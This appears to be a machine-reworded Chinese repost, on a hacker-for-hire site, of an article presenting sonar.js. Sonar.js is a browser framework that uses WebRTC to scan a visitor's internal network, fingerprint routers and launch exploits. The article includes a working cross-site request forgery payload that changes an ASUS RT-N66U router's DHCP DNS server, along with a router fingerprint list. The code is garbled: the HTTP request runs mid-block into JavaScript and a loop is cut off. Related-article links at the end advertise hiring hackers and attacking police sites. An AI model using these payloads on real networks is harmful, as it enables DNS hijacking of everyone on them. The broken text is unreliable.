Sonar.js:内部网服务器扫描仪和运用的网页框架

访客4年前关于黑客接单693

近期,WebRTC做为一种应用基本网页页面扫描仪內部 *** 的 *** 出現在新闻报道中。大家早已看到了这类作用的一些趣味的运用,例如《 *** 》扫描仪你的內部 *** 来检验智能机器人。互联网技术上的任意网页页面可以扫描仪你的內部 *** 来找寻线上服务器是恐怖的。 *** 攻击能够对你內部 *** 上的主题活动服务器干什么?假如给你过内网渗透的工作经验,就会发现这类状况的恐怖之处。很多內部 *** 弥漫着只必须默认设置凭据就可登录的设备,一系列的cve漏洞让应用Metasploitable开展渗入看起来很安全性,内部网中也有这些插在某一角落里从没配备过的设备。殊不知,虽然WebRTC是很多电脑浏览器的一个恐怖特点,但我都沒有见到一切应用它开发设计漏洞运用的架构。

sonar.js详细介绍

做为回复,我搭建了sonar.js。应用JavaScript、WebRTC和一些onload hackery来检验 *** 上的內部设备的架构。sonar.js的原理是运用WebRTC枚举类型內部 *** 上的主题活动服务器。在枚举类型一个主题活动IP以后,sonar.js试着连接到静态数据资源,如CSS、图象和JavaScript,另外建空onload恶性事件程序处理。假如资源取得成功载入并开启onload恶性事件,那麼大家就了解服务器有着该资源。了解这一有什么作用?根据获得停留在设备上的资源目录,我们可以试着对该设备开展指纹验证。比如,Linksys WRT56G路由器有下列静态数据资源:

/UILinksys.gif

/UI_10.gif

/UI_07.gif

/UI_06.gif

/UI_03.gif

/UI_02.gif

/UI_Cisco.gif

/style.css

因而,如果我们将全部这种资源都置入到大家的网页页面中,而且他们回到一个取得成功的onload恶性事件,那麼大家就可以毫无疑问这一设备的确是一个Linksys WRT54G路由器。sonar.js为大家自动化技术了这一全过程,并容许网站渗透测试工作人员为一系列设备搭建一个自定漏洞目录,假如根据上边的方式检验到一个设备,那麼就会运行搭配的漏洞。

应用sonar.js搭建漏洞

如今您早已了解了sonar.js的原理,大家用它来搭建一个能用的POC。在本训练中,大家试着将內部 *** 上的全部要求再次路由器到我们自己的故意DNS *** 服务器。因为 *** 上的全部手机客户端全是根据DHCP从路由器得到DNS设定的,因此 大家务必对其开展折中。在真实的进攻中,你能有好几个不一样型号规格的路由器的漏洞结合,但现阶段大家仅仅要创建asusRT-N66U WiFi路由器的漏洞结合。幸运的是,RT-N66U沒有跨网站要求仿冒维护,因此 我们可以向这些根据路由器验证的人仿冒要求。下边是一个变更路由器默认设置DNS端口设置的实例要求(它是 *** 上全部手机客户端的DNS *** 服务器):

POST /start_apply.htm HTTP/1.1

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,**;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.withCredentials=true;

var body="productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=192.168.1.1&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=8.8.8.8&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=";

var aBody=new Uint8Array(body.length);

for (var i=0; i new Blob([aBody]));

如今大家的总体目标路由器有一个漏洞——那麼大家如何把它集成化到sonar.js中呢?更先,大家必须建立一个sonar.js指纹识别,下边的编码精彩片段表明了这类指纹识别的文件格式:

var fingerprints=[

{

'name': "ASUS RT-N66U",

'fingerprints':["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],

相关文章

找黑客改成绩真的可行吗,黑客渗透公安网站

一、改成绩真的可行吗怎么找黑客 1、找站接网单如果要写一个程序,而不仅仅是一个纯粹的经济利益,无论它是否免费,只要它是完成的程序员。改成绩真的可行吗供练手的黑客最重要的信条是他们不相信权威当局提倡自己...

微信被拉黑找黑客帮忙-二十四小时在线黑客(24小时在线的网络黑客微信)

微信被拉黑找黑客帮忙-二十四小时在线黑客(24小时在线的网络黑客微信)

微信被拉黑找黑客帮忙相关问题 国内的黑客很低级相关问题 黑客喜欢上传什么文件 黑客怎么用网站看用户信息(黑客论坛网站源码)...

孙浩献唱电视剧《装台》 温暖演绎人生苦辣酸甜

中国娱乐网讯 电视剧《装台》正在CCTV-1黄金时间火热播出,张嘉益、闫妮等戏骨齐聚,故事围绕着刁家、街坊邻居及装台队的视线展开,上演了一出充满烟火气的温暖人生。该剧...

电脑上特殊符号怎么打出来?太简单了

电脑上特殊符号怎么打出来?太简单了

在很多情况下我们在编辑文档的时候都会用到特殊符号,拼打的方法其实有很多种,今天给大家介绍常用到的几种拼写特殊符号的方法,一起来看看吧。   一、输入法拼写法 比如说,你要输入常见的序号如:①...

印度北方邦一汽车与朝鲜现状卡车相撞后起火 致5人死亡

  当地时间12月22日清晨,印度北方邦阿格拉市亚穆纳高速公路上发生一起车祸。一辆汽车与一辆油罐车相撞后起火,事故造成汽车内5人被烧死。   警方表示,初步查明事故原因为卡车转向出现失误,由于载客汽...

去哪找黑客群-手机黑客十大软件苹果(苹果手机防黑客攻击软件)

去哪找黑客群-手机黑客十大软件苹果(苹果手机防黑客攻击软件)

去哪找黑客群相关问题 黑客QQ多少相关问题 如何假装成为黑客 黑客钓鱼网站大全(黑客钓鱼网站) 黑客如何手机满电...